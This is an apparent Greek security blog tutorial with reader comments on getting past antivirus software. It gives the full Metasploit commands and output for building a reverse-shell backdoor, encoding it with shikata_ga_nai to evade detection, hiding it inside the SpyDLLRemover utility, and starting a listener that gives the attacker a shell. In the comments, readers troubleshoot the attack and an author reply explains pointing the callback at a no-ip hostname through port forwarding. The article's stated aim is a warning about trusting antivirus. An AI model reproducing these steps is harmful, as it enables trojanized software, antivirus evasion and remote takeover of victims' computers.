Το προφίλ μας στο Google Plus
32

Προσπέρασμα Antivirus και συνέπειες

Σύστημα Windows χωρίς antivirus φωνάζει ότι ο κάτοχός του ζητάει αφορμές για μπελάδες κι επεισόδια! Αλλά μη νομίζετε, η πρώτη άμυνα κατά του malware *δεν* είναι το όποιο antivirus…

Ακόμα κι ένα διαρκώς ενημερωμένο antivirus που ταυτόχρονα διαθέτει άριστα heuristics και δυνατότητες sandboxing, είναι ανήμπορο να προστατεύσει τον ιδιοκτήτη του από την ίδια του την αφέλεια. Γι’ αυτό και δεν χάνουμε ευκαιρία να επαναλαμβάνουμε ότι πρώτη γραμμή άμυνας είναι η συμπεριφορά μας, όχι το όποιο software προστασίας -καλώς- χρησιμοποιούμε.

Επειδή όμως οι γενικές συμβουλές δεν έχουν την ίδια αξία με τα πρακτικά παραδείγματα, στο παρόν άρθρο θα δούμε τι μπορεί να συμβεί αν δεν είμαστε σώφρονες κι εγκαθιστούμε ό,τι μας κατέβει, μένοντας εφησυχασμένοι στη σκέψη ότι έχουμε ενεργοποιημένο antivirus, το οποίο, παρεμπιπτόντως, είναι και πλήρως ενημερωμένο με τα πλέον πρόσφατα virus definitions.

Για τη συνέχεια θα δουλέψουμε με το Metasploit μέσα από ένα BackTrack VM. Για τις ανάγκες της επίδειξής μας θα χρησιμοποιήσουμε κι ένα Windows 7 Ultimate 32bit VM. Πιο συγκεκριμένα, αρχικός μας στόχος στο παρόν άρθρο είναι να φτιάξουμε ένα backdoor, το οποίο όταν τρέχει σε κάποιο Windows host θα δίνει στον επιτιθέμενο πλήρη πρόσβαση στο σύστημα. Αλλά δεν θα περιοριστούμε σ’ αυτό. Το backdoor θα το κωδικοποιήσουμε ώστε ναι μεν να εξακολουθεί να ‘ναι εκτελέσιμο και να κάνει τη δουλειά του, αλλά να ‘ναι κι εξαιρετικά δύσκολο να εντοπιστεί από αρκετά antivirus! Και σαν να μην έφτανε αυτό, θα δείξουμε πώς είναι δυνατόν το backdoor να ενσωματωθεί μέσα σ’ ένα άλλο, εντελώς αθώο πρόγραμμα. Φυσικά, η ενεργοποίηση του αθώου προγράμματος θα συνεπάγεται και την ταυτόχρονη ενεργοποίηση του backdoor. Και κάπου εδώ νομίζουμε ότι έχουμε την προσοχή σας, οπότε μπορούμε να περάσουμε στη δράση ;)

Εικόνα 1: Απλό backdoor φτιαγμένο από το Windows Reverse TCP payload (εκδοχή single) του Metasploit, με τη βοήθεια του εργαλείου msfpayload. Τα μισά από τα antivirus engines που γνωρίζει η υπηρεσία novirusthanks το χαρακτηρίζουν ως malware. Εντύπωση προκαλεί το γεγονός ότι τα δύο δημοφιλέστερα δωρεάν antivirus, τα Avast! κι AVG, αναγνωρίζουν το backdoor, όχι όμως και κάποια εμπορικά, όπως τα NOD32 και TrendMicro (βλ. όμως εκδόσεις των engines).

Δημιουργία backdoor
Δουλεύουμε με το εργαλείο του Metasploit ονόματι msfpayload, χάρη στο οποίο μπορούμε να δημιουργούμε εκτελέσιμα ξεκινώντας από payloads του Metasploit. Εμείς τώρα θέλουμε να φτιάξουμε ένα executable, το οποίο όταν εκτελείται στο μηχάνημα του θύματος θα παρέχει στον attacker ένα πλήρες shell προς αυτό. Για το σκοπό μας επιλέγουμε το Windows Reverse TCP payload.

Το Metasploit υποστηρίζει τριών ειδών payload: τα singles, τα stagers και τα stages. Τα singles περιλαμβάνουν όλον τον κώδικα που χρειάζονται προκειμένου να κάνουν τη δουλειά τους. Τα δε stagers έχουν ελάχιστο κώδικα, ακριβώς όσον απαιτείται για ν’ ανοίξουν μια σύνδεση προς το box του attacker. Απ’ αυτό φορτώνουν στη μνήμη του victim box τον υπόλοιπο κώδικα που χρειάζονται για ό,τι άλλο υποτίθεται ότι κάνουν, όπως, π.χ., παροχή command shell. Τέλος, τα stages είναι ο κώδικας που φορτώνουν τα stagers *αφού* ανοίξουν μια σύνδεση προς το box του attacker.

Εικόνα 2: Το ίδιο backdoor αλλά αυτή τη φορά φτιαγμένο από την εκδοχή stager του Windows Reverse TCP payload αναγνωρίζεται από τρία περισσότερα antivirus - πάντα από το σύνολο εκείνων που διαθέτει η υπηρεσία novirusthanks. Παρατηρήστε ότι το εμπορικό TrendMicro εξακολουθεί να μην το αναγνωρίζει.

Για το backdoor που θέλουμε να φτιάξουμε υπάρχει εκδοχή single και stager. Ας δούμε τι γίνεται με την πρώτη. Σε μια κονσόλα του BackTrack πληκτρολογούμε:

<br />
root@bt:~# msfpayload windows/shell_reverse_tcp O<br />
Name: Windows Command Shell, Reverse TCP Inline<br />
     Module: payload/windows/shell_reverse_tcp<br />
    Version: 8642<br />
   Platform: Windows<br />
       Arch: x86<br />
Needs Admin: No<br />
 Total size: 314<br />
       Rank: Normal</p>
<p>Provided by:<br />
  vlad902 &amp;lt;vlad902@gmail.com&amp;gt;<br />
  sf &amp;lt;stephen_fewer@harmonysecurity.com&amp;gt;</p>
<p>Basic options:<br />
Name      Current Setting  Required  Description<br />
----      ---------------  --------  -----------<br />
EXITFUNC  process          yes       Exit technique: seh, thread, none, process<br />
LHOST                      yes       The listen address<br />
LPORT     4444             yes       The listen port</p>
<p>Description:<br />
  Connect back to attacker and spawn a command shell<br />

Δίνοντας στο msfpayload το όνομα του payload μαζί με την οδηγία (O)ptions, παίρνουμε πληροφορίες για το exploit. Μεταξύ άλλων βλέπουμε το μέγεθός του σε bytes (314), καθώς και τις παραμέτρους που δέχεται. Προφανώς, από αυτές εμείς πρέπει να καθορίσουμε την LHOST – συγκεκριμένα να της δώσουμε το IP του box μας (εμάς ήταν το 192.168.117.130). Ας δημιουργήσουμε λοιπόν το εκτελέσιμο:

<br />
root@bt:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.117.130 X &amp;gt; ~/backdoor.exe<br />
Created by msfpayload (http://www.metasploit.com).<br />
Payload: windows/shell_reverse_tcp<br />
 Length: 314<br />
Options: LHOST=192.168.117.130<br />

Παρατηρήστε ότι αυτή τη φορά δώσαμε στο msfpayload την οδηγία e(X)ecutable. Χάρη και στον τελεστή ανακατεύθυνσης ‘>’, στο home directory του root πήραμε το εκτελέσιμο με όνομα backdoor.exe. Ας το ανεβάσουμε γρήγορα γρήγορα στην υπηρεσία novirusthanks, να δούμε πόσα και ποια antivirus το εντοπίζουν! Διαπιστώνουμε ότι 8 από τα 16 antivirus που γνωρίζει το novirusthanks μαρκάρουν το backdoor.exe ως malware, μεταξύ αυτών και τα Avast! κι AVG, δύο από τα δημοφιλέστερα δωρεάν antivirus.

Εικόνα 3: Το backdoor μας είναι τώρα κωδικοποιημένο με τον shikata ga nai (ένα πέρασμα) κι αυτή τη φορά το αναγνωρίζουν 7 από τα 16 antivirus angines της υπηρεσίας novirusthanks. Από τα δημοφιλή, δωρεάν engines, εκείνο του Avast! αποτυγχάνει.

Ας δούμε τι γίνεται αν ανεβάσουμε το ίδιο backdoor που τώρα όμως έχει παραχθεί από την εκδοχή stager του payload:

<br />
root@bt:~# msfpayload windows/shell/reverse_tcp O</p>
<p>       Name: Windows Command Shell, Reverse TCP Stager<br />
     Module: payload/windows/shell/reverse_tcp<br />
    Version: 10394, 11421<br />
   Platform: Windows<br />
       Arch: x86<br />
Needs Admin: No<br />
 Total size: 290<br />
       Rank: Normal</p>
<p>Provided by:<br />
  spoonm &amp;lt;spoonm@no$email.com&amp;gt;<br />
  sf &amp;lt;stephen_fewer@harmonysecurity.com&amp;gt;<br />
  hdm &amp;lt;hdm@metasploit.com&amp;gt;<br />
  skape &amp;lt;mmiller@hick.org&amp;gt;</p>
<p>Basic options:<br />
Name      Current Setting  Required  Description<br />
----      ---------------  --------  -----------<br />
EXITFUNC  process          yes       Exit technique: seh, thread, none, process<br />
LHOST                      yes       The listen address<br />
LPORT     4444             yes       The listen port</p>
<p>Description:<br />
  Connect back to the attacker, Spawn a piped command shell (staged)<br />

Παρατηρήστε ότι το όνομα του payload μετά το “shell” έχει slash αντί για underscore. Αυτή είναι και η μοναδική διαφοροποίηση στην ονομασία των δύο εκδοχών. Από κει και πέρα υπάρχει και η ουσιαστική διαφορά του μεγέθους: Η staged εκδοχή είναι μικρότερη από την single, για την ακρίβεια είναι 290 αντί για 314 bytes. Από τη στιγμή που τα antivirus engines δουλεύουν *και* με βάση τα signatures, αυτά τα 24 bytes είναι πιθανό να κάνουν τη διαφορά. Περιμένουμε, δηλαδή, ότι όσο μικρότερο είν’ ένα αρχείο τόσο πιο δύσκολο θα ‘ναι να μαρκαριστεί ως κακόβουλο. Για να δούμε, επαληθεύεται η θεωρία από την πράξη; Φτιάχνουμε το backdoor μας δίνοντας

<br />
root@bt:~# msfpayload windows/shell/reverse_tcp LHOST=192.168.117.130 X &amp;gt; ~/backdoor-stager.exe<br />
Created by msfpayload (http://www.metasploit.com).<br />
Payload: windows/shell/reverse_tcp<br />
 Length: 290<br />
Options: LHOST=192.168.117.130<br />

κι αμέσως μετά ανεβάζουμε το αρχείο backdoor-stager.exe στο novirusthanks. Διαπιστώνουμε ότι αυτή τη φορά 11 από τα 16 antivirus το μαρκάρουν ως malware! Συμπέρασμα: Η θεωρία μας δεν επαληθεύεται στην πράξη – τουλάχιστον όχι για το συγκεκριμένο backdoor. Είναι προφανές ότι πρέπει ν’ αλλάξουμε στρατηγική.

Εικόνα 4: Ο shikata ga nai με δύο περάσματα δίνει ένα backdoor που το αναγνωρίζουν 6 από τα 16 antivirus της υπηρεσίας novirusthanks. Τα δωρεάν AVG κι Avast! αποτυγχάνουν, το ίδιο και τα εμπορικά NOD32 και TrendMicro. Σημειώστε ότι περισσότερα από 2 περάσματα του shikata ga nai δεν βελτιώνουν την

Κωδικοποίηση backdoor
Ένα εξαιρετικά χρήσιμο εργαλείο που υπάρχει στην εργαλειοθήκη του Metasploit είναι το msfencode. Δουλειά του είναι να παίρνει ένα αρχείο και να παράγει ένα άλλο, το οποίο αποτελεί μια κωδικοποιημένη εκδοχή του αρχικού. Την ίδια την κωδικοποίηση, μ’ άλλα λόγια τον αλγόριθμο μετασχηματισμού, τον επιλέγει ο χρήστης από ένα σύνολο διαθέσιμων. Για να τους δούμε όλους αρκεί να δώσουμε

<br />
root@bt:~# msfencode -l</p>
<p>Framework Encoders<br />
==================</p>
<p>    Name                    Rank       Description<br />
    ----                    ----       -----------<br />
    cmd/generic_sh          good       Generic Shell Variable Substitution Command Encoder<br />
    cmd/ifs                 low        Generic ${IFS} Substitution Command Encoder<br />
    cmd/printf_php_mq       good       printf(1) via PHP magic_quotes Utility Command Encoder<br />
    generic/none            normal     The &amp;quot;none&amp;quot; Encoder<br />
    mipsbe/longxor          normal     XOR Encoder<br />
    mipsle/longxor          normal     XOR Encoder<br />
    php/base64              great      PHP Base64 encoder<br />
    ppc/longxor             normal     PPC LongXOR Encoder<br />
    ppc/longxor_tag         normal     PPC LongXOR Encoder<br />
    sparc/longxor_tag       normal     SPARC DWORD XOR Encoder<br />
    x64/xor                 normal     XOR Encoder<br />
    x86/alpha_mixed         low        Alpha2 Alphanumeric Mixedcase Encoder<br />
    x86/alpha_upper         low        Alpha2 Alphanumeric Uppercase Encoder<br />
    x86/avoid_utf8_tolower  manual     Avoid UTF8/tolower<br />
    x86/call4_dword_xor     normal     Call+4 Dword XOR Encoder<br />
    x86/context_cpuid       manual     CPUID-based Context Keyed Payload Encoder<br />
    x86/context_stat        manual     stat(2)-based Context Keyed Payload Encoder<br />
    x86/context_time        manual     time(2)-based Context Keyed Payload Encoder<br />
    x86/countdown           normal     Single-byte XOR Countdown Encoder<br />
    x86/fnstenv_mov         normal     Variable-length Fnstenv/mov Dword XOR Encoder<br />
    x86/jmp_call_additive   normal     Jump/Call XOR Additive Feedback Encoder<br />
    x86/nonalpha            low        Non-Alpha Encoder<br />
    x86/nonupper            low        Non-Upper Encoder<br />
    x86/shikata_ga_nai      excellent  Polymorphic XOR Additive Feedback Encoder<br />
    x86/single_static_bit   manual     Single Static Bit<br />
    x86/unicode_mixed       manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder<br />
    x86/unicode_upper       manual     Alpha2 Alphanumeric Unicode Uppercase Encoder<br />

Όπως φαίνεται κι από τη στήλη Rank, ο καλύτερος αλγόριθμος κωδικοποίησης είναι ο “shikata ga nai” (“τίποτε δεν μπορεί να γίνει γι’ αυτό”, στα Ιαπωνικά). Θα τον εφαρμόσουμε λοιπόν στην έξοδο του msfpayload, με στόχο να πάρουμε ένα αποτέλεσμα που δεν θα ‘ναι εύκολα αναγνωρίσιμο από τα antivirus engines. Πρώτα όμως πρέπει να πάρουμε το payload σε μορφή (R)aw, αφού σε τέτοια θα το περιμένει το msfencode. Δεν υπάρχει πρόβλημα – αρκεί να δώσουμε στο msfpayload την κατάλληλη οδηγία:

<br />
root@bt:~# msfpayload windows/shell/reverse_tcp LHOST=192.168.117.130 R &amp;gt; ~/backdoor.raw<br />
root@bt:~# ls -lh backdoor.raw<br />
-rw-r--r-- 1 root root 290 Feb 20 16:57 backdoor.raw<br />
root@bt:~# file backdoor.raw<br />
backdoor.raw: data<br />

Πάνω στο αρχείο backdoor.raw εφαρμόζουμε τον shikata ga nai και στην έξοδό του παίρνουμε ένα κωδικοποιημένο εκτελέσιμο:

<br />
root@bt:~# cat backdoor.raw | msfencode -e x86/shikata_ga_nai -t exe &amp;gt; ~/backdoor.exe<br />
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)<br />

Σημειώστε ότι ο συγκεκριμένος αλγόριθμος είναι δυνατόν να εφαρμοστεί περισσότερες από μία φορές πάνω στο ίδιο σύνολο δεδομένων, “ανακατώνοντάς” το περαιτέρω σε κάθε πέρασμα ή επανάληψη (iteration). Μη βιαστείτε όμως να συσχετίσετε τον αριθμό των επαναλήψεων με την ανιχνευσιμότητα του backdoor μας από τα antivirus engines. Όμως κάθε πράγμα στην ώρα του. Προς το παρόν, ας ανεβάσουμε το νέο, κωδικοποιημένο κατά shikata ga nai εκτελέσιμο στο novirusthanks. Όπως βλέπουμε, αυτή τη φορά το αναγνωρίζουν 7 στα 16 antivirus, με το Avast! να μη συγκαταλέγεται σ’ αυτά. Καλό αυτό. Ας δοκιμάσουμε τώρα να εφαρμόσουμε τον αλγόριθμο δύο φορές (βλ. παράμετρο -c):

<br />
root@bt:~# cat backdoor.raw | msfencode -e x86/shikata_ga_nai -c 2 -t exe &amp;gt; ~/backdoor.exe<br />
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)<br />
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)<br />

Ανεβάζοντας ξανά το backdoor.exe στο novirusthanks, διαπιστώνουμε ότι τώρα μόλις 6 στα 16 antivirus το αναγνωρίζουν, με τα δύο δημοφιλέστερα δωρεάν, το Avast! και το AVG, να μη συγκαταλέγονται σ’ αυτά! Στο σημείο αυτό η όρεξη ανοίγει και είναι λογικό να δοκιμάσουμε τον shikata ga nai με περισσότερες επαναλήψεις. Όπως όμως μπορείτε να δείτε κι εσείς, από ένα σημείο και μετά οι επαναλήψεις δεν έχουν νόημα. Για παράδειγμα, με 4 επαναλήψεις επιστρέφουμε στα 7 από τα 16 antivirus, ενώ με 8 επαναλήψεις στα 6 από τα 16. Φαίνεται, μ’ άλλα λόγια, ότι από ένα σημείο και μετά ο αλγόριθμος ταλαντώνεται ή αλλιώς επαναλαμβάνεται χωρίς ν’ αυξάνει την εντροπία, για να χρησιμοποιήσουμε κι έναν όρο από τη φυσική. Αλλά δεν πρέπει να είμαστε αχάριστοι: Χρησιμοποιώντας δωρεάν εργαλεία και χωρίς να κοπιάσουμε ή να σπαζοκεφαλιάσουμε, καταφέραμε και δημιουργήσαμε ένα backdoor το οποίο είναι αόρατο για δύο από τα δημοφιλέστερα δωρεάν antivirus, καθώς κι από ορισμένα εμπορικά (βλ., π.χ., έκδοση 4.2.42.0 του NOD32 και 9.120-1004 του TrendMicro).

Εικόνα 5: Το απλό, κωδικοποιημένο κατά shikata ga nai (δύο περάσματα) backdoor μας που βασίζεται στην εκδοχή single του Windows Reverse TCP payload, μόλις έχει εκτελεστεί στο Windows 7 box του θύματος. Ο επιτιθέμενος έχει ένα πλήρες command shell στο απομακρυσμένο μηχάνημα.

Καμουφλάρισμα!
Το msfencoder υποστηρίζει την ενσωμάτωση ενός payload μέσα σ’ ένα άλλο εκτελέσιμο, δυσχεραίνοντας έτσι σημαντικά την ανίχνευση του κακόβουλου κώδικα. Όσο για το υποψήφιο θύμα, τα πράγματα είναι ακόμα πιο ζοφερά. Πλέον, όχι μόνο δεν παίρνει κάποια προειδοποίηση από το antivirus, αλλά τρέχει μια γνωστή, καθωσπρέπει εφαρμογή. Την ίδια στιγμή, φυσικά, σιωπηρά εκτελείται και το backdoor :S

Εικόνα 6: Με τη βοήθεια του msfencoder, στο εκτελέσιμο της εφαρμογής SpySLLRemover έχει εισαχθεί ένα backdoor κωδικοποιημένο κατά shikata ga nai (8 περάσματα). Το νέο executable αναγνωρίζεται μόλις από 4 εκ των 16 antivirus engines της υπηρεσίας novirusthanks. Εντύπωση προκαλεί το γεγονός ότι το Avast! το αναγνωρίζει!

Για να δοκιμάσουμε αυτή τη δυνατότητα του msfpayload, σ’ ένα Windows VM κατεβάσαμε την εκδοχή portable του SpyDLLRemover από το

<br />
http://portableapps.com/apps/utilities/spydllremover_portable<br />

Την εγκαταστήσαμε στο δικό της φάκελο -μην ξεχνάτε ότι πρόκειται για portable app- και από τον υποφάκελο App/SpyDLLRemover πήραμε το εκτελέσιμο SpyDLLRemover.exe και το μεταφέραμε στο BackTrack VM. Εκεί, έχοντας έτοιμη την εκδοχή raw του Windows Reverse TCP payload (single), πληκτρολογήσαμε:

<br />
root@bt:~# cat backdoor.raw | msfencode -e x86/shikata_ga_nai -c 8 -k -x ~/SpyDLLRemover.exe -t exe &amp;gt; ~/SDLLR.exe<br />

Ανεβάζοντας το SDLLR.exe στο novirusthanks διαπιστώσαμε ότι μόλις 4 από τα 16 antivirus engines το χαρακτήρισαν ως malware. Εντύπωση μας έκανε το γεγονός ότι από τα δωρεάν, γνωστά antivirus, το Avast! κατάφερε να το εντοπίσει αλλά όχι το AVG. Στη συνέχεια μετονομάσαμε το SDLLR.exe σε SpyDLLRemover.exe κι αντικαταστήσαμε το πρωτότυπο. Πριν εκτελέσουμε την εφαρμογή σε περιβάλλον Windows 7, στο BackTrack σηκώσαμε τον κατάλληλο listener:

<br />
root@bt:~# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=192.168.117.130 E<br />

Αμέσως μετά τρέξαμε το SpyDLLRemover στο Windows 7 VM. Η εφαρμογή ξεκίνησε ωραιότατα, το ίδιο και το backdoor (βλ. εικόνα 7).

Εικόνα 7: Το θύμα μόλις έτρεξε την portable εκδοχή του γνωστού εργαλείου SpyDLLRemover. Αποτελεί μεγάλη ειρωνεία ότι ένα πρόγραμμα για την απομάκρυνση malware περιλαμβάνει backdoor, δίνοντας στον επιτιθέμενο πλήρη πρόσβαση στο σύστημα του ανυποψίαστου θύματος!

Συμπεράσματα
Πολύ απλά, όποιο antivirus κι αν έχουμε δεν το εμπιστευόμαστε στα τυφλά. Επίσης: Ακόμα κι αν πρόκειται να εγκαταστήσουμε μια γνωστή εφαρμογή, αν δεν την έχουμε πάρει από μια επίσημη, έμπιστη πηγή δεν δικαιούμαστε να πιστεύουμε ότι είναι “καθαρή” από malware. Τέλος, τις περιπτώσεις που σώνει και καλά θέλουμε να κατεβάσουμε και να εκτελέσουμε ένα ύποπτο πρόγραμμα, καλό είναι να το κάνουμε μέσα από VM το οποίο *δεν* επικοινωνεί με το host OS. Για την ακρίβεια πρώτα παίρνουμε snapshot του VM, στη συνέχεια κάνουμε μέσα σ’ αυτό ό,τι είναι να κάνουμε και τέλος επαναφέρουμε το snapshot, εξαφανίζοντας ό,τι είναι πιθανό ν’ άφησε πίσω του το όποιο malware.

32 Responses to “Προσπέρασμα Antivirus και συνέπειες”

  1. Mars Engine | 18/11/2011 at 11:48

    Xμμμ…..
    Θεωρούσα το ESET ως το top antivirus…. πολύ περίεργο!
    Βέβαια στο άρθρο βλέπω το NOD32 και όχι το Smart Security που έχω εγώ! Δεν ξέρω αν παίζει κι αυτό το ρόλο του! Λές να το γυρίσω σε BitDefender?

    • subZraw | 18/11/2011 at 12:08

      Όχι βέβαια, να μείνεις στο Smart Security. Το άρθρο δεν αποτελεί συγκριτικό AVs και σίγουρα δεν θα μπορούσε να βγει συμπέρασμα από ένα μόνο backdoor, που κατασκευάστηκε από το Metasploit. Είναι και το άλλο: Το άρθρο γράφτηκε τον Μάρτη του 2011. Αν ακολουθήσεις τα βήματα που περιγράφονται και κάνεις τις ίδιες δοκιμές με την υπηρεσία novirusthanks, θα πάρεις εντελώς διαφορετικά αποτελέσματα.

      Για να συνοψίσω, να πω ξανά ότι το άρθρο δεν αποτελεί συγκριτικό AVs αλλά θέλει να δείξει πώς εργαζόμαστε για να φτιάξουμε ένα backdoor που είναι *πιθανό* να περάσει απαρατήρητο από *κάποια* AVs. Τελικός στόχος του άρθρου, φυσικά, είναι να δείξει ότι *δεν* πρέπει να εμπιστευόμαστε τυφλά το όποιο AV χρησιμοποιούμε αλλά να εφαρμόζουμε *και* κριτική σκέψη. Μόνο τότε έχουμε ουσιαστική ασφάλεια (που και πάλι δεν είναι στο 100% :D)

  2. mkosmas | 18/11/2011 at 12:03

    Ωραίο άρθρο. Τι γίνετε αν το περάσω 2 φορες από τον shikata ga nai και μετά άλλες 2 από έναν άλλο αλγόριθμο; Αυτό θα βοηθήσει στο να μην μας το μαρκάρουν ως malware;

    • subZraw | 18/11/2011 at 12:12

      Όχι απαραίτητα (το έχω δοκιμάσει κι εγώ :D)
      Αν πάντως δοκιμάσεις και βρεις κάποιον ενδιαφέροντα συνδυασμό, please, feel free to share!

  3. kos6101991 | 10/01/2012 at 16:41

    Giati mou emfanizei synexws ayto…??

    [*] Command shell session 1 closed. Reason: Died from Errno::ECONNRESET
    ti ftaiei??

    • subZraw | 10/01/2012 at 17:41

      Greeklish εδώ;! (Δις)
      Μα καλά, δεν μπήκες καν στον κόπο να διαβάσεις τους εξαιρετικά απλούς, σύντομους και 1000% τίμιους κανόνες δημοσίευσης; (http://deltahacker.gr/forum-rules)

      Μας ραγίζεις την καρδιά, να το ξέρεις :(

  4. kos6101991 | 10/01/2012 at 19:02

    Συγγνωμη για το ατοπημα….αλλα ειχα μπει απο λαιβ backtrack και δεν εγραφε ελληνικα…καμια ιδεα ρε παιδια για το προβλημα…??

    • subZraw | 10/01/2012 at 22:31

      Με λίγα λόγια, η σύνδεση με τον απομακρυσμένο host διακόπτεται.

      Θέλεις να μας πεις λίγα περισσότερα για το setup σου; Δουλεύεις σε εικονικό LAN, με VMs; Μήπως σε αληθινό LAN, με αληθινούς υπολογιστές; (Στοιχηματίζω το δεύτερο.)

      Κι ένα τελευταίο: Ο υπολογιστής-στόχος από ποιον ελέγχεται;

  5. kos6101991 | 11/01/2012 at 13:17

    Και τα 2 pc βρισκονται σπιτι μου.Το ενα που κανει την επιθεση τρεει backtrack 5 kai το αλλο windows 7 .ακουστε τι θελω να κανω.την μια φορα να περασει το backdoor kai apo antivirus και να εκτελεστει κανονικα και μια δευτερη φορα να διακοψω την επιθεση με το snort.Αυτο ειναι ολο.Ακομη προσπαθησα το backdoor me to vnc_dll και παλι μου λεει οτι ο vnc server δεν βρισκεται στο path…..

  6. kos6101991 | 11/01/2012 at 13:56

    Αυτο μου βγαζει για το vnc dll ….
    [-] Failed to launch vncviewer. Is it installed and in your path?

    Τι πρεπει να κανω ρε παιδια….???Ειμαι απελπισμενοςςς….:((:(((

  7. kos6101991 | 17/01/2012 at 10:41

    Το ελυσα το προβλημα τελικα απλα ηθελα να εγκαταστησω μερικα πακετα παραπανω……….Παντως περα απο την πλακα ειναι πολυ κριμα που το forum ειναι ετσι “ψοφιο”,το λεω παντα με φιλικη διαθεση….!!!

    • subZraw | 17/01/2012 at 10:46

      Τι έφταιγε, τελικά; (Το forum θα ζωηρέψει, απλά χρειάζεται λίγο καιρό ακόμα :D)

      • kos6101991 | 19/01/2012 at 19:05

        Νομιζει οτι κατι τετοιο δεν θα γινει ποτε διοτι χρησιμοποιειτε πολυ το fb και το tweet ,ενω αν ολοι εμπαιναν στο σαιτ για να δουν νεα ανακοινωσεις θα ηταν αλλιως τα πραγματα….!!

        • subZraw | 19/01/2012 at 20:02

          Κοίτα, καταλαβαίνω τι λες, σήμερα όμως είναι απλά αδύνατον να *μην* χρησιμοποιείς το Facebook και το Twitter. Η κίνηση όμως θα αυξηθεί και εδώ — και θ’ αυξηθεί λόγω του υλικού που θ’ αρχίσουμε ν’ ανεβάζουμε σύντομα ;)

          • kos6101991 | 20/01/2012 at 10:37

            οκ τοτε παω πασο….ααα και δεν χρησιμοποιω κανενα απο τα “κοινωνικα δικτυα”……::)))

  8. kos6101991 | 13/02/2012 at 11:12

    Ρε παιδια εχω το εξης προβλημα…δοκιμαζω exploit σε καποιο win-box με meterpreter payload αλλα συνεχως μου εμφανιζει lang:Unknown. το βοχ εχει ελληνικα,χτες το αλλαξα σε αγγλικα αλλα παλι τπτ .μου εμφανιζει οτι δεν βρσκει τη γλωσσα και δεν μπορει να κανει συνδεση …..καμια ιδεα για λυση…??

  9. iosmaris | 28/03/2012 at 11:19

    Μήπως ξέρει κανείς, τι ακριβώς κάνει το “Apache httpd Web Server Range Header Denial of Service Vulnerability”

    http://www.exploit-db.com/exploits/17696

    βρέθηκα ξαφνικά με το 80 port ανοιχτό στο backtrack.

    αναφορά από openvas-security

    Ευχαριστώ

  10. RhythmicAttack | 28/09/2012 at 20:14

    Μαγκες σορρυ που ειμαι λιγο νοομπ …οταν παταω …
    msfpayload windows/shell_reverse_tcp O
    μου λεει ..Invalid Payload: windows/shell_reverse_tcp Γιατι ??

    • Ion | 29/09/2012 at 13:28

      Προφανώς γιατί δεν υπάρχει αυτό το path… (είναι /shell/reverse_tcp). Δοκίμασε γενικά και την εντολή

      msfpayload -l

      (θα αργήσει να εκτελεστεί) για να δεις μια λίστα με όλα τα διαθέσιμα payloads. Παρεπιπτόντως, έχει βγει πλέον το εργαλείο

      msfvenom

      που έχει αντικαταστήσει τα msfpayload και msfencode. Δες και εδώ: http://www.phillips321.co.uk/2011/07/07/metasploits-msfvenon-command-line-utility/

  11. RhythmicAttack | 29/09/2012 at 19:48

    Οταν πατάω msfpayload -l το έχει στη λίστα ..!!
    Μήπος φταίει που έχω framework2 ?? το 3 γινετε να το βάλω ?
    Δουλέυω ΒΤ5kdeR2 σε VMBox ! Πειράζει που δεν το έχω κάνει install ??
    Οσο για το msfvenom φαίνετε πολύ κομπλέ !! Έφτιαξα ένα payload.exe στο μπάμ οπως λέει στο λινκ .. αλλά δεν μπορώ να το στείλω στα windows..το
    samba δεν μπορεί να το κλικάρει.
    Μια που άρχισα να κάνω ερωτήσεις ..(σορρυκιολας)
    Τις προάλλες που έκανα SiteClone + Spoof το fb όλα γίναν κομπλέ ..Μόλις όμως έμπαινα σαν θύμα απο τα windows(vista) έκανε σαν τρέλο και στο BT μου έλεγε συνέχεια code 404 message file not found !! Τι παίζει ??

  12. SKROYTZ | 09/03/2013 at 15:19

    Παίζει να είμαι και ο πιο άσχετος. Αλλά μία ερώτηση. Γιατί για παραπάνω δεν με παίρνει. Τι γλώσσα προγραμματισμού χρησιμοποιείται ή είναι πάνω από μία και ποιες ;; :D

    • subZraw | 09/03/2013 at 15:26

      Φαντάζομαι ότι αναφέρεσαι στο payload, αυτό δηλαδή που *δεν* θέλουμε να αναγνωρίζεται από τα antivirus. Αυτό το payload, λοιπόν, στο συγκεκριμένο άρθρο δεν το γράφουμε σε κάποια γλώσσα προγραμματισμού αλλά για να το δημιουργήσουμε χρησιμοποιούμε τα εργαλεία του Metasploit Framework.

      Αν δεν βοήθησα, γίνε σε παρακαλώ λίγο πιο συγκεκριμένος… :)

      • SKROYTZ | 09/03/2013 at 15:29

        Εννοώ ότι στο όλο θέμα για να καταλήξεις εκεί που θέλεις και σε όλα τα βήματα άμα χρησιμοποιήθηκε κάποια γλώσσα προγραμματισμού :D ή είναι όπως είπες όλα εργαλεία ;; :)

  13. iasonaspao | 07/07/2013 at 15:11

    μήπως ξέρει κάποιος πως να εκτελέσω αυτό το αρχείο(backdoor) από το pc με τα windows?

  14. stath3000 | 11/08/2013 at 18:59

    το δοκιμάζω σε 64bit και δεν δουλεύει γτ?

  15. stath3000 | 11/08/2013 at 19:06

    και πρέπει να αλλάξω για να πάω σε 64bit?

  16. maxtor | 25/09/2015 at 12:28

    γεια και χαρα

    δεν ξερω αν ειναι το σωστο post για να κανω την ερωτηση μου μιας και υπαρχουν πολλα σχετικα αρθρα για την παραμετροποιηση του payload.
    η ερωτηση ειναι η εξης:
    μπορω να βαλω τιμη στο lhost, hostname απο την υπηρεσια noip;

    • subZraw | 25/09/2015 at 12:34

      Μπορείς, ναι. Φρόντισε όμως ώστε ο host (με το Metasploit) είτε να είναι στο DMZ του router είτε να υπάρχει ο κατάλληλος κανόνας port forwarding στον router.

      Κάνε τις δοκιμές σου και μην ξεχάσεις να μας μεταφέρεις τις εντυπώσεις σου, please.

  17. maxtor | 02/11/2015 at 15:54

    ενταξει,δουλευει.
    και το DMZ ανοιξε την πορτα και η υπηρεσια του noip δουλεψε.
    μην ξεχναμε μονο να κανουμε εγκατασταση τον client του noip για να συγχρονιστει με την ip μας.
    αυτο που δεν καταφερα να κανω ειναι να κρατησω ανοιχτο το session του meterpreter.
    μηπως θα μπορουσε καποιος να μου δωσει καποια συμβουλη.

    ευχαριστω.!

Leave a Reply

You must be logged in to post a comment.

Σύνδεση

Αρχείο δημοσιεύσεων